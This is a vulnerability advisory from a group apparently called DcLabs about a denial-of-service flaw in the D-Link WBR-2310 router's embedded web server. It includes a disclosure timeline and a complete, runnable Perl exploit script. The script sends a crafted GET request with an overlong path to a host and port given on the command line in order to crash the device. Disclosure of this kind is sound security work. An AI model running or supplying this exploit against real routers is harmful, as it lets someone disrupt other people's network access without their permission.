[DCA-00014] Dlink WBR-2310 Wireless Router DoS

[DCA-00014]

[Software]

• Dlink WBR-2310 Embedded Web Server

[Vendor Product Description]

• The D-Link RangeBooster G™ WBR-2310 with enhanced 108 features the
  industry’s first default 108Mbps* “Dynamic Mode” that allows clients
  to always operate at the highest possible speeds while automatically
  identifying and recognizing other D-Link RangeBooster G™ products for
  highest performance capability and seamless access to the wireless
  network in a homogeneous environment.

[Bug Description]

• The Embedded Web Server does not sanitize correctly a crafted GET
  request leading to Denial-of-Service.

[History]

• Advisory sent to vendor on 07/20/2010
• No response from vendor
• We tried to contact again on 07/30/2010
• No response from vendor
• Public advisory & exploit 08/02/2010.

[Impact]

• Low-Medium

[Affected Version]

• Firmware Version: 1.04
• Hardware Version: A1
• Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

    if (@ARGV < 1) {
            usage();
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];

    print "[+] Sending request...\n";

    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

    sleep(3);
    close($socket);

    print "[+] Done!\n";

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 192.168.0.1 80\n";
exit;
}

[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

[Greetz]
Crash and all Dclabs members.

–
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br